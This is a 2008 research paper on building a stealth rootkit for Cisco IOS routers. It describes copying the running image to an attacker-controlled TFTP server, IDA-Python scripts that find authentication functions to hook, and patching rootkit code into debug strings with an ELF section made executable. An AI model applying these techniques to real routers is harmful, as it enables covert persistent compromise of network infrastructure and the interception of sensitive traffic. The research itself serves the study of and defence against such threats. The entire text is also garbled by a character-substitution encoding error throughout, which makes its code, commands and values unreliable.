DIK (Da Ios rootKit) Sebastian 'topo' Muiz May 2008 Abstract Rootkits are ery co!!on in !ost operating syste!s" inclu#ing popular $in#o%s" &inu' an# (ni' so)t%are" or any ariant o) those syste!s" ho%eer they are rarely )oun# in e!be##e# OSes* This is #ue to the )act that !ost o) the ti!e e!be##e# OSes hae close# source co#e" %ith the internals o) the so)t%are unkno%n to the public" !aking the reerse engineering process har#er than usual* +n real li)e" it's ery co!!on that once an attacker takes control o) a syste!" he or she %ill %ant to !aintain access to it" an# in an atte!pt to keep those actions un#etecte# a rootkit %ill be installe#* The rootkit seizes control o) the entire OS running on the co!pro!ise# #eice by hi#ing )iles" processes an# net%ork connections" an# allo%ing unauthorize# users to act as syste! a#!inistrators ,, %hile retaining its stealth capabilities an# hi#ing the attacker's presence* This paper #e!onstrates that a rootkit %ith those characteristics can easily be create# an# #eploye# )or a close# source OS like Cisco +OS an# run hi##en )ro! syste! a#!inistrators suriing !ost" i) not all" o) the security !easures that can be #eploye# by e'perts in the )iel#* -s a proo) o) this theory" seeral #i))erent techni.ues )or in)ecting an +OS target %ill be #escribe#" inclu#ing i!age binary patching* /ro! a practical point o) ie%" one o) these techni.ues %ill be i!ple!ente# using a set o) 0ython123 scripts that proi#e the necessary !etho#s to insert a generic rootkit i!ple!entation %ritten in the C progra!!ing language,, calle# 4+5 64a +OS Rootkit7, into the target +OS* Page 1 of 37 Introduction The case o) Cisco +OS 6)or!erly kno%n as the +nternet%ork Operating Syste!7 is uni.ue because it is likely the !ost %i#ely #eploye# routing OS running on the entire +nternet an# a )un#a!ental co!ponent o) !ission critical net%orking operations in al!ost eery organization* 8et%ork #eices are ital to those operations" an# sensitie #ata )lo%s through the! eery secon#" !aking the! an e'tre!ely strategic location )or attackers to place rootkits to gather in)or!ation )ro! a target* Syste! a#!inistrators nee# to be prepare# )or the e!ergence o) these types o) threats because the attacks coul# lea# to serious e'ploits" inclu#ing #ata breaches" be)ore they eer realize that so!ething is going on* Security !easures are typically un#ertaken to #etect any abnor!al operations on Cisco #eices" but so!eti!es those !easures !ay not be enough to #etect a#ance# rootkits* These e))orts !ay only uneil high,leel rootkits such as a TC& script 6only recent ersions o) +OS support TC& as a scripting language7" or #eice recon)iguration e'ecute# ia startup,con)ig )ile to alter routes" packet han#ling" etc* These high,leel rootkits are co!parable to user,!o#e rootkits in general purpose operating syste!s such as $in#o%s" &inu' an# OS 9* Only a s!all percentage o) all syste! a#!inistrators per)or! perio#ic security au#its on their organizations: net%ork in)rastructure to #etect )or potential syste! co!pro!ise* These au#its !ay inclu#e 6but are not li!ite# to7 eri)ying router logs" checking e'ternal logs that %ere set by the router %hen a user logge#,in or change# the #eice:s con)iguration" or een by #o%nloa#ing the running +OS i!age to co!pare its checksu! %ith a preiously calculate# alue )ro! the original +OS i!age )ile* To con#uct any o) these actions" the syste! a#!inistrator i!plicitly relies on +OS internal )unctions an# trusts the integrity o) the running +OS i!age* +) the #eice is co!pro!ise#" the logging an# syslog )unctions can be altere# to coer the attacker's actions !aking the au#it co!pletely useless* Page 2 of 37 Knowing the enemy Oer the years" Cisco has create# !ultiple har#%are con)igurations 6een using #i))erent C0( architectures ,, !ost co!!only 0o%er0C an# M+0S7 %ith arie# so)t%are )eatures sets 6i*e*" %ireless" ;o+07 to a##ress the nee#s o) its custo!ers* This has re.uire# that the co!pany also !ake !ultiple an# uni.ue +OS ersions aailable because each iteration #e!an#e# a separate buil# process to a##ress the speci)ic )eature set running on the inole# har#%are* The co!bination o) !ultiple har#%are plat)or!s an# )eature sets has resulte# in the aailability o) seeral thousan#s o) uni.ue +OS i!ages that coul# potentially run on a gien set o) #eices* -nother i!portant )actor is that +OS %as not #esigne# to support a##itional !o#ules or allo% )or plug,ins to be loa#e#* $ith all this in !in#" an initial conclusion !ight be that the #eelop!ent o) a generic rootkit that targets +OS !ight be too #i))icult" i) not i!possible" to achiee* <o%eer" this paper %ill #e!onstrate that this challenge can in )act be easily sole# %ith a generic !etho# that a##resses the nee# to !aintain co#e )or !ultiple architectures an# +OS )eature sets" or )or progra!!ing the rootkit core in #i))erent asse!bly languages* IOS Internals Cisco +OS has a !onolithic architecture %hich runs as a single i!age %ith all processes haing access to each other:s !e!ory* 8o !e!ory protection is i!ple!ente# bet%een processes" %hich !eans that a bug in an in#ii#ual process can 6an# probably %ill7 corrupt other processes an# co!pro!ise syste! operations" potentially lea#ing to a general )ailure* -nother characteristic o) the Cisco +OS is that its sche#uler )unction is not pree!ptie" as its counterparts on other !o#ern OSes %oul# be* Cisco +OS uses run-to-completion priority scheduling" %hich is an i!proe# /+/O 6/irst,+n" /irst,Out7 sche#uler" co!bine# %ith threa# priorities* This !eans that %hen a process is sche#ule#" it runs until it #eci#es to relinkish the associate# priilege an# !ake a syste! call to allo% other processes to run on the sa!e priority leel or higher* Page 3 of 37 These high,priority processes can =u!p to the hea# o) the line an# run .uickly on the C0(* +) !ultiple processes are %aiting %ith the sa!e priority" they are processe# in the or#er in %hich they're receie# 6=ust like basic /+/O7* 8e%er Cisco +OS i!ages are usually !a#e o) a >2,bit E&/ )ile running on a piece o) har#%are %ith a R+SC processor 6!ost co!!only M+0S or 0o%er0C7* +t's i!portant to note that Cisco engineers !o#i)ie# so!e o) the alues )ro! a stan#ar# E&/ hea#er so that any tool trying to obtain in)or!ation )ro! the )ile %ill )in# lots o) inali# alues" thus !aking initial #iagnostic a little bit annoying* 0ossible i!age !o#i)ication techni.ues to obtain a ali# E&/ )ile %ill be #iscusse# later an# also ho% this is achiee# by 4+5* IOS initial setu on memory This i!age contains a sel),#eco!pressing 6S/97 hea#er that unpacks the )ully )unctional +OS co#e %hich %ill be relocate# in !e!ory #uring run,ti!e* +t is co!presse# because it contains !any strings that occupy precious !e!ory" resources that are nee#e# !ore all the ti!e %ith the continue# arrial o) ne%er +OS ersions %ith a##itional )eature sets* +!age #eco!pression an# relocation inoles seeral steps %hich !ust be un#erstoo# since the i!age #o%nloa#e# )ro! the #eice is not the actual i!age that runs %hen the #eice is po%ere# on* -s preiously note#" this is !erely a )ile that sel),#eco!presses at run,ti!e to e'ecute the real +OS OS co#e* So" in or#er to place a back#oor the unco!presse# i!age is nee#e#* /or that reason" the co!presse# +OS i!age is the one that %ill be !anipulate# )irst to unpack it's content" then analyze# as to )igure out ho% to insert 6binary !o#i)y7 the back#oor an# )inally repack the i!age to return in back to the #eice* Repacking the i!age !eans that its checksu!s !ust be recalculate# to re)lect the binary !anipulation that has been co!plete# so that it can pass through initializing tests that %oul# )orbi# the !o#i)ie# i!age )ro! running on the #eice %hen a ali# checksu! is not )oun#* -n +OS co!presse# i!age has the )ollo%ing structure? Page 4 of 37 @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A E&/ hea#er A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A S/9 co#e A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ ,,@ A Magic 60'/EE4/-CE7 A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A Co!presse# i!age length A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A Magic A Co!presse# i!age checksu! A A Structure @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A (nco!presse# i!age checksu! A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A (nco!presse# i!age length A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ ,,@ A A A Co!presse# i!age A A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ The !agic structure is use# by the #eco!pression routine so that it can obtain the alues nee#e# )or the #i))erent checksu!s that are calculate# using the speci)ie# lengths e'presse# in %or#s 6B bytes7* This !eans that i) the speci)ie# length is 202B" then the alue is? 202B %or#s ' B bytes per each %or# C B0DE bytes This structure is also a pointer to the beginning o) the co!presse# co#e* Once the #eice po%ers on" it %ill start the ROM Monitor %hich %ill per)or! seeral steps to loa# the +OS i!age an# %ill use the !agic structure ele!ents #uring this process* This process inoles seen steps? 2* The ROM Monitor %ill loa# an# position the S/9 i!age at its link a##ress in !e!ory 6either )ro! a )lash boot or a netboot7 as the E&/ hea#er speci)ies* This is %hen the i!age )ile is copie# )ro! the )ile syste! to the #eice !e!ory an# the !ain routine is inoke#* 2* 8o% the !agic structure is locate# using the alue o) a global ariable calle# 'e#ata' that is initialize# by the ROM Monitor* -t this point" this ariable points #irectly to the structure containing the alues nee#e# to checksu! an# #eco!press the i!age* Page 5 of 37 >* The routine in the S/9 i!age then checks to ensure that enough !e!ory is aailable )or #eco!pression using the alue o) the )iel# 'unco!presse# i!age length' o) the !agic structure* +) there is not enough !e!ory aailable" then the co#e returns to the ROM Monitor %ith a so)t%are )orce reloa# signal a)ter generating a !essage containing the te't? FError ? !e!ory re.uire!ents e'cee# aailable !e!oryG* -lso re!e!ber that the return to the !onitor is not inten#e# to occur unless a reloa# %as initiate#* B* - checksu! o) the co!presse# i!age is calculate# an# the result is co!pare# against the alue store# in the )ile to ensure that no corruption has occurre#* The checksu! algorith! is ery si!ple an# %orks using the length )iel# alue 6either the co!presse# or the unco!presse#7 )ro! the !agic structure* The co#e that calculates the checksu! is si!ilar to the )ollo%ing? int n%or#s C co!presse#Hsize I sizeo)6ulong7J unsigne# long su! C 0J II contains the checksu! result unsigne# long al C 0J II te!porary alue unsigne# charK bu)p C 6ucharK7 ptr4ataJ II pointer to II #ata to eri)y %hile 6n%or#s,,7 L al C Kbu)p@@J su! @C alJ i) 6su! M al7 L IK There %as a carry KI su!@@J N N O* The co!presse# co#e is then !oe# to a higher !e!ory location an# the PSS section is initialize# %ith zeros* E* The #eco!pression process takes place* The #eco!presse# i!age is also checksu!!e# to ensure there %as no corruption an# i) it )ails" then a !essage containing the te't FError? unco!presse# i!age checksu! is incorrectG is #isplaye#* -lso" the size o) the #eco!presse# i!age is co!pare# against the alue store# in the hea#er to ensure that %as co!pletely success)ul* Q* (sing an internal )unction calle# copyHan#Hlaunch67" the co#e relocation phase takes place !oing the i!age to the speci)ie# Page 6 of 37 a##ress in the E&/ )ile hea#er so the i!age entry point is calle#* +t's %orth !entioning that i) this call returns" then FError? copyHan#Hlaunch67 returne#G is #isplaye#* !he beginning of the end The rootkit %ill locate certain key 6an# usually lo%,leel7 )unctions o) the OS that is being co!pro!ise# to per)or! a binary patch an# then hook the!* These )unctions are strategic co#e locations that %ill allo% the attacker to intercept #ata o) interest* They coul# be groupe# by their )unctionality? Syste! &ogin -uthentication an# authorization /ile syste! access 8et%orking operations 0rocess han#ling +n)or!ation #isplay Syste! &ogs 4ebugging an# core #u!ps This paper %ill #e!onstrate ho% to i#enti)y only so!e o) those )unctions because the i#enti)ication proce#ure is the sa!e )or all o) the!* +n the case o) a close# source OS like Cisco +OS" the )irst thing to #o is i#enti)y the co#e that carries out the inole# )unctions* +n or#er to per)or! an analysis" it is necessary to obtain the i!age running on the target #eice* This can be easily #one by con)iguring an /T0 or T/T0 serer on a !achine controlle# by an attacker" an# then issuing a copy co!!an# on the Cisco #eice co!!an# line like the )ollo%ing? RouterR copy )lash?c2ED2,i,!z*22>,22*bin t)tp?II2Q2*2>*2*22Ic2ED2,i,!z*22>,22*bin ;eri)ying checksu! )or Sc2ED2,i,!z*22>,22*bin' 6)ile R 27***1O53 $riting test TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT Page 7 of 37 (ploa# to serer #one /lash #eice copy took 00?00?08 1hh?!!?ss3 RouterR $ith the target +OS i!age #o%nloa#e# it's no% possible to #eco!press it an# then procee# to the analysis phase" !o#i)y the binary an# in)ect it* Though binary patching is not the only %ay to #o this" other possible in)ection !etho#s %ill be e'plaine# later* Chasing the rey Once the )ile %as obtaine#" a )e% steps !ust be )ollo%e# to be able to analyze the +OS i!age an# correctly #etect the preiously !entione# )unctions? 2* -s preiously state#" the i!age insi#e the #eice is co!presse#" so you !ust procee# to #eco!press it* The #eco!pression process is the sa!e as )or any zippe# )ile so it's also possible to use any )ree unzip utility to #o it* Once the i!age is unpacke# the script %ill checksu! it to ensure that there %as no corruption* 2* The #eco!presse# i!age" calle# C2ED2,+,*P+8" !ust be analyze# using +4- 0ro1>3 to obtain crucial in)or!ation )or the rootkit:s surial* This can take seeral !inutes" een hours" because unco!presse# +OS i!age )iles take up seeral !egabytes 6especially those ersions %ith a#ance# )eatures sets7* >* Once +4- )inishes" the i!age %on't be co!pletely analyze# because seeral )unctions an# !ultiple string re)erences %ill be !issing* To a##ress this proble! another script %ill be use#* +t utilizes +4-0ython1B3 to auto!ate the )unction an# string recognition process* The script per)or!s its task in a t%o phase process? /irst it'll look )or kno%n seg!ents o) CO4E type an# iterate oer eery instruction aligne# to a B byte !e!ory boun#ary* +) the instruction is not actually part o) a )unction" then the )unction is create# an# +4- takes care o) #etecting its en#* The script then !oes to the instruction a)ter the en# o) the preiously recognize# )unction an# tells +4- that this Page 8 of 37 belongs to a )unction" an# so on* This is #one in +4-,0ython %ith a script like this? class Enhance#-nalysis? RES(&THO5 C 0 RES(&THERR C 2 $-SHPRE-5 C 2 #e) HHinitHH6sel)7? sel)*#ataHsegs C list67 sel)*co#eHsegs C list67 #e) create(nresole#/unctions6sel)7? UUU -nalyze the co#e section to )in# eery non,)unction byte an# create a )unction at that position* This is highly reliable because C+SCO co!piler creates one )unction a)ter another an# eery instruction is aligne# to Bbytes because o) the R+SC arch* UUU print '1@3 0rocessing CO4E seg!ents?' R +terate through each co#e seg!ent aailable )or seg in sel)*co#eHsegs? currHa##ress C seg*startE- counter C 0 initialH)uncsH.ty C getH)uncH.ty67 result C sel)*RES(&THO5 print ' -nalyzing V'WsV'***' W Seg8a!e6seg*startE-7" R Start iteration on eery non,)unction byte until %e R reach the en# o) the current %orking seg!ent* %hile currHa##ress M seg*en#E-? R +) 'cancel' button %as presse#" stop R processing )unctions* i) %asPreak67? result C sel)*$-SHPRE-5 print 'Cancelle#' return R Xet the ne't a##ress that is not a )unction R recognize# by +4-* Page 9 of 37 ne'tHa##ressC)in#HnotH)unc6currHa##ress"SE-RC<H4O$87 i) ne'tHa##ress TC P-4-44R an# V ne'tHa##ress TC 0'////////? i) Make/unction6 ne'tHa##ress" P-4-44R 7 TC 0? counter @C 2 currHa##ress C ne'tHa##ressJ R Check i) %e reache# the en# o) the co#e seg!ent i) getHite!Hsize6 currHa##ress 7 CC 0? break currHa##ress C getHite!Hen#6 currHa##ress 7 R 4etect an inali# ite! or )unction at the R current position* i) currHa##ress CC P-4-44R or V currHa##ress CC 0'////////? result C sel)*RES(&THERR break print '4one' print '1@3 Create# a total o) W# ne% )unctions' W counter return result $ith )unctions correctly #etecte#" eery instruction aligne# to a B byte !e!ory a##ress in 4-T- type seg!ents is then iterate# to recognize eery string re)erence belonging to those )unctions* The script per)or!s a##itional checks to ensure that the alues at the !e!ory a##ress being analyze# are a string" instea# o) a re)erence 6pointer7 to it* /or e'a!ple" in a case %here the 4-T- seg!ent begins at 0'Q0E20000" the script tries to #eter!ine i) the alue 0'Q2E2Q>Q> is the string FpassG or a re)erence to the !e!ory a##ress %here a string coul# be store#* 8e't is a part o) the +4-,0ython script that per)or!s those tasks? Page 10 of 37 #e) create(nresole#Strings6sel)7? UUU This )unction conerts eery aligne# string into a +4- string so that it can be re)erence# )ro! the #isasse!bly* Pecause o) R+SC architecture eery string is aligne# to a B byte boun#ary an# the rest o) ,unaligne#, the bytes until the ne't string are pa##e# %ith zeros* UUU re)reshHstrlist60" 0'))))))))7 ne%HstrHcounter C 0 R ne% strings )oun# counter print '1@3 0rocessing 4-T- seg!ents?' R +terate through each co#e seg!ent aailable )or seg in sel)*#ataHsegs? currHa##ress C seg*startE- initialHstrH.ty C getHstrlistH.ty67 print ' -nalyzing V'WsV'***' W Seg8a!e6seg*startE-7" R Re!oe current area )or!at be)ore %e reanalize it* sel)*un#e)ine-rea6currHa##ress" seg*en#E-7 %hile currHa##ress CC P-4-44R or currHa##ressMseg*en#E-? R +) 'cancel' butto! %as presse#" stop R processing strings* i) %asPreak67? print 'Cancelle#' return R Check eery B bytes 6>2 bits align!ent7 i) currHa##ress W B? currHa##ress @C B , 6currHa##ress W B7 R Check i) this is a alue rea#y to be conerte# R either to string or #%or#* currHbyte C getHbyte6currHa##ress7 R +) %e )in# a printable or control character" R probably it's a string* i) 6currHbyte YC 0'20 an# currHbyte M 0'Q)7 or V currHbyte CC 0'- or currHbyte CC 0'4 or V currHbyte CC 0'D? Page 11 of 37 R Pe)ore conerting it to a string or #%or#" %e R check seg!ents a##ress space an# co!pare it R %ith the B byte alue at the current a##ress R being processe#* R This %ay %e can #etect any o))set to a R )unction or to a string or #ata in R the sa!e seg!ent or a si!ple string array* R R E'a!ple? +t !ay happen that a string R 'abc#' 60'E2E2E>EB7 is #etecte# as an R o))set i) 0'E2999999 is a ali# seg!ent R a##ress" so this %oul# be an error* R To aoi# this + think %e shoul# not only check R the )irst character but the other" too* #%HcurrHa##ress C getHlong6currHa##ress7 )or co#eHseg in sel)*co#eHsegs? co#eHsegHen#Hea C co#eHseg*en#E- trans)or!Hto C '' i) #%HcurrHa##ress TC 0'////////? i) 66#%HcurrHa##ress YC seg*startE-7 V an# 6#%HcurrHa##ress MC seg*en#E-77V or V 66#%HcurrHa##ressYCco#eHseg*startE-7V an# V 6#%HcurrHa##ress MC co#eHseg*en#E-77? trans)or!Hto C '#%or#' break R 4o not continue checking else? trans)or!Hto C 'string' else? trans)or!Hto C 'string' else? trans)or!Hto C '#%or#' i) trans)or!Hto CC 'string'? R $e #i# not use MakeStr because o) a bug in R +4-0ython an# because %e can't set the R >r# para!eter* i) !akeHasciiHstring6currHa##ress" 0" -SCSTRHC7? ne%HstrHcounter @C 2 else? Make4%or#6currHa##ress7 Page 12 of 37 R Check i) %e reache# the en# o) the seg!ent i) getHite!Hsize6 currHa##ress 7 CC 0? break currHa##ress C getHite!Hen#6 currHa##ress 7 print '4one' R Report the nu!ber o) ne% strings )oun# print '1@3 Conerte# W# strings' W ne%HstrHcounter return result -)ter a )e% !inutes" all strings that are not recognize# by +4- 0ro %ill be create# an# seeral ne% strings %ill be )oun#* The )ollo%ing is the script's output to the +4- !essage console? +nitiating enhance# C+SCO +OS analysis*** 1@3 /oun# CO4E seg!ent '*te't' at 0'80008000 1@3 /oun# 4-T- seg!ent '*ro#ata' at 0'80CE-B2B 1@3 /oun# 4-T- seg!ent '*#ata' at 0'822BO-P0 1@3 /oun# 4-T- seg!ent '*s#ata' at 0'822->-/8 1@3 0rocessing CO4E seg!ents? -nalyzing '*te't'*** 4one 1@3 Create# a total o) 2820B ne% )unctions 1@3 0rocessing 4-T- seg!ents? -nalyzing '*ro#ata'*** 4one -nalyzing '*#ata'*** 4one -nalyzing '*s#ata'*** 4one 1@3 Conerte# 2QEQQ> strings 1@3 Enhance# analysis took Q*0> !inutes -s you can see" once the script )inishes" the i!age is rea#y to use an# can be e'a!ine# by the attacker to gain kno%le#ge o) Cisco +OS internals using all the ne% in)or!ation ac.uire# by +4-* Success)ul +OS i!age analysis is ery i!portant because it contains plenty o) #ebugging strings to proi#e erbose in)or!ation to the syste! a#!inistrator about the OS state* Those #ebug strings %ill be use# as a starting point to #etect the key )unctions o) the OS an# because it's kno%n )or sure that these strings re!ain the sa!e across !ultiple +OS ersions* Page 13 of 37 "esistance is futile So!e o) those interesting )unctions !ight not be locate# because o) co!piling issues or it !ight not be possible to retriee any string re)erences in so!e cases si!ply because they #o not use any strings at all* -s state# be)ore" the +OS contains plenty o) strings" !ost o) %hich o))er #ebugging in)or!ation" an# others that !erely output co!!only seen !essages to the user ter!inal* These !essages can be locate# in )unctions close to those that %e are looking )or" an#" kno%ing that they %ill not be !oe# by the co!piler" it's possible to try to )in# these 'neighbor' )unctions an# then i#enti)y the ones releant to the rootkit )unctionality an# hook the!* /unction reor#ering is co!!on on !o#ern co!pilers" but this is not the case in the co!piler use# by Cisco so our approach is reliable in this scenario* +4- 0ython %ill be use# to help us to locate the necessary strings an# the co#e re)erences attache# to the!* /or this purpose" a class %as create# insi#e o) the script that %ill per)or! the binary patch* This class %ill take a list o) pre#e)ine# strings an# %ill per)or! the search operation returning to a list o) cross, re)erences 6+4-'s 're)s7 to those strings* The !e!ory location re)erencing those strings is the !e!ory location o) the inole# )unctions" so no% it's =ust a !atter o) asking +4- about the beginning o) the )unction to kno% %here a =u!p to the rootkit co#e can be inserte#* The location o) neighbor )unctions is not necessarily i!!e#iate to the one nee#e# )or the rootkit" there coul# be another )unction %ithout any string re)erences separating the!" but this approach %ill still succee#* To illustrate the )unctions recognition !etho# a )unctions layout %ill be sho%n ne't as an e'a!ple? Page 14 of 37 @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborH!inusH2 A M, uses a uni.ue string* @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborH!inusH2 A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A A chkHpass A M, )unction o) interest A A )or the rootkit @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborHplusH2 A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborHplusH2 A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ +n the case that the )unction chkHpass67 #oesn't contain any string but the )unction neighborHplus267 #oes" the )ollo%ing steps !ust be acco!plishe# to locate the chkHpass67 )unction? 2* +terate through the list o) strings on +4- to search )or the strings re)erence# by )unction neighborHplus267* +n +4-,0ython this can be #one by a si!ple )unction like this? #e) )uncString6stringHtoH)in#7? UUU/unction to )in# the speci)ie# string a!ong allUUU R Re)resh the list o) +4- strings re)reshHstrlist60" 0'////////7 R Store in)or!ation about the speci)ie# string stringHin)o C stringHin)oHt67 R +terate through eery string aailable )or i in range6getHstrlistH.ty677? R Xet the current string ite! to co!pare against the list getHstrlistHite!6i" stringHin)o7 i) len6stringHtoH)in#7 CC stringHin)o*length? R /oun# )lag stringH!iss!atch C /alse R Pyte,to,byte co!parison is .uicker that entire string )or = in range6stringHin)o*length7? i) or#6stringHtoH)in#1=37 TC Pyte6stringHin)o*ea@=7? stringH!iss!atch C True Page 15 of 37 R return string a##ress i) stringH!iss!atch CC /alse? return stringHin)o*ea return 0 R string not )oun# 2* Obtain a list o) eery #ata re)erence 6+4- calls it '#re)' ,, a re)erence to a #ata in the speci)ie# !e!ory a##ress7 to the string use# to i#enti)y the )unction chkHpass67 %ith the )ollo%ing co#e? #e) get4ataRe)s6stringHa##ress7? R Store the list o) #ata re)erences to the speci)ie# string stringH#re)s C list67 re) C getH)irstH#re)Hto6stringHa##ress7 %hile re) TC P-4-44R? R Check i) list is e!pty to aoi# )urther ali#ations i) len6stringH#re)s7? R Check i) preious re) is the sa!e* R E'planation is in the te't bello% TTT i) 6stringH#re)s1,23 @ B7 CC re)? continue else? R -## the )irst re)erence to the list stringH#re)s*appen#6re)7 stringH#re)s*appen#6re)7 re) C getHne'tH#re)Hto6stringHa##ress" re)7 return stringH#re)s 5eep in !in# that in R+SC architectures the !e!ory re)erence alues are loa#e# using t%o instructions because a >2,bit !e!ory a##ress cannot be re)erence# #irectly using only B byte instructions* This %ay t%o #ata re)erences %ill be issue# 6one to re)er to the upper 2 bytes" an# another )or the lo%er 2 bytes7 that still belong to the sa!e source co#e* 4ue to the )act that the co!piler puts those t%o instructions together" a check is issue# to eri)y i) the last appen#e# re)erence# a##ress" plus B" is e.ual to the current re)erence* +t %ill happen that +4- %ill #etect &- 6&oa# -##ress7 !acro Page 16 of 37 instruction in M+0S* 4o not con)use this %ith 0o%er0C &- 6&oa# -##ress7 instruction" %hich is a !acro )or the -44+ instruction* -n e'a!ple o) string pointer loa# on 0o%er0C #isasse!bly )ollo%s? *te't?802C>Q40 lis WrE" a;eri)y0assZh R U;eri)y passU *te't?802C>Q4B a##i WrE" WrE" a;eri)y0assZl R U;eri)y passU The &+S 6&oa# +!!e#iate Shi)te#7 loa#s the upper 2 bytes o) the !e!ory a##ress o) the string in register RE %hile the instruction -44+ 6-## +!!e#iate7 loa#s the lo%er 2 bytes to RE* 8o% the register contains the !e!ory a##ress o) the string*
+n an +OS i!age running on M+0S architecture" the )ollo%ing #isasse!bly co#e is obtaine#? *te't?E020208B la [a>" a;eri)y0ass R U;eri)y passU The &- 6&oa# -##ress7 !acro instruction is recognize# by +4- but it is not a real instruction because it's a !acro %rapping the )ollo%ing co#e? *te't?E020208B lui [a>" 0'E228 R U;eri)y passUZh *te't?E0202088 a##iu [a>" 0'Q>>B R U;eri)y passUZl The )irst instruction is &(+ 6&oa# (pper +!!e#iate7 an# loa#s the 2 upper bytes into register -> an# then the instruction -44+( 6-## +!!e#iate (nsigne#7 a##s the 2 lo%er bytes !aking register -> a pointer to the !e!ory a##ress containing the string* >* 8o% the !e!ory a##ress containing the co#e that re)erences the string in )unction neighborH!inusH267 is kno%n* +t's also kno%n that the )unction chkHpass67 is t%o )unctions a%ay )ro! the )unction neighborH!inusH267 so it can be resole# easily using +4-,0ython? R 're)H)oun# contains the a##ress o) the co#e re)erencing R the string that %as preiously obtaine#* )nHneighborH!inusH2 C getH)unc6're)H)oun#7 )nHneighborH!inusH2 C getHne'tH)unc6)nHneighborH!inusH2*startE-7 )nHchkHpass C getHne'tH)unc6)nHneighborH!inusH2*startE-7 Page 17 of 37 )irstHinstHa##ress C )nHchkHpass*startE- $ith those easy steps" the !e!ory a##ress o) the )irst instruction pointing to the )unction prologue %ill be obtaine#* The )unction prologue %ill be replace# by a hook to =u!p to our co#e but this %ill be e'plaine# in #etail later* -lso note that the neighbor )unction coul# be locate# at any #istance or )ro! any #irection 6be)ore or a)ter7 )ro! the )unction chkHpass67 so this approach %ill still %ork because the co!piler puts one )unction a)ter another as #eclare# in the source co#e* #ome sweet home The rootkit location !ust be #eci#e# be)ore any i!age patching takes place 6%hether it is on the )ile or at run,ti!e7 because the patches applie# at the beginning o) eery )unction %ill =u!p to the rootkit co#e an# they !ust kno% its !e!ory location* Taking a#antage o) +OS !e!ory !anage!ent protection 6or the lack o) it7 rootkit co#e %ill be %ritten on the 4-T- seg!ent by sacri)icing a #ebug string %hich %ill al!ost probably neer be use#* Cisco +OS has plenty o) these strings an# !ost o) the! are co!!on along seeral ersions 6i) not all7* \ust in case the syste! a#!inistrator #eci#es to use so!e +OS )eature that re.uires that string" a 8(&& character %ill be %ritten at the )irst character to aoi# string #isplaying proble!s an# also to aoi# user suspicion* To )in# a speci)ic string" re)er to the preious section %ere +4-,0ython is use# )or this purpose* There are seeral %ays to insert the rootkit co#e in the )ile an# they are all %ell kno%n )or any &inu' irus %riter because it's !ainly a stan#ar# E&/ in)ection proce#ure1O31E3* /or e'a!ple" kno%ing that eery E&/ section is aligne# to a !e!ory page size" one possible techni.ue is to use the unuse# space bet%een sections* This re.uires section length !o#i)ications on the E&/ hea#er but this is easy to achiee* -nother %ay to in)ect the i!age is a##ing ne% sections at the en# o) the )ile" but this re.uires e'tensie E&/ hea#er an# sections hea#er table !o#i)ications* Page 18 of 37 8o #etaile# e'planation %ill be gien about those techni.ues" an# only )or the sake o) clarity is it !entione# that oer%riting an e'isting string resource in the )ile is the !etho# chosen because it #oesn't re.uire any E&/ hea#er !anipulations* This !etho# is the easiest in this case because +OS i!ages contain ery long strings that are rarely use# an# there is no nee# to !o#i)y the E&/ hea#er alues because eery section an# seg!ent re!ains the sa!e* The #o%nsi#e o) this !etho# is that it re.uires a bigger )ootprint because o) the sacri)ice o) #ebug strings %hich coul# co!pro!ise our rootkit presence on the syste!* -s !entione# at the beginning o) the paper" the rootkit core %ill be i!ple!ente# in plain C so %e !ust co!pile the rootkit an# e'tract )ro! it the )unctions %hich per)or! the tasks nee#e# ,, %ithout the %hole i!age hea#ers 6%e %ill probably setup XCC1Q3 to cross, co!pile183 to 0o%er0C,E&/ or to M+0S,E&/" so E&/ )ile hea#ers !ust be aoi#e#7* -)ter e'tracting the rootkit co#e )ro! the resulting )ile" a chunk o) bytes %ill be obtaine# an# this is the co#e that %ill be %ritten oer the selecte# string" but this %ill be coere# in #etail later* +n so!e cases the 4-T- seg!ent per!issions 6in %hich the string resi#es7 nee# to be change# to R$9 6Rea#,$rite,e9ecute7 because those sections %ere preiously use# to allocate strings an# no co#e e'ecution capability %as re.uire# )ro! the!* +n case the attacker pre)erre# to create an a##itional section in the i!age )ile" E&/ )ile hea#er !o#i)ication or any other operation on the )ile sections or seg!ents" coul# be easily #one %ith the 0yEl)1D3 library specially create# )or this pro=ect* +t is also possible to change )ile section per!issions to a## E9EC using our 0yEl) as sho%n in the )ollo%ing e'a!ple? )ro! pyel) i!port El) )ro! sections i!port S</HE9EC+8STR iosH)ilena!e C 'C2ED2,+,*P+8' el) C El)6iosH)ilena!e7 R -ssu!ing that section nu!ber > is '*te't' #ataHsec C el)*sections1>3 print '1,3 Ol# )lags? Ws' W #ataHsec*get/lagsString67 Page 19 of 37 R -##ing E9EC )lag print '1,3 -##ing S</HE9EC+8STR )lag? Ws' W S</HE9EC+8STR123 #ataHsec*set/lags6#ataHsec*get/lags67 A S</HE9EC+8STR1037 print '1,3 8e% )lags? Ws' W #ataHsec*get/lagsString67 R $rite #o%n ne% )ile alues to the sa!e )ilena!e R %ith '*ne%' e'tension 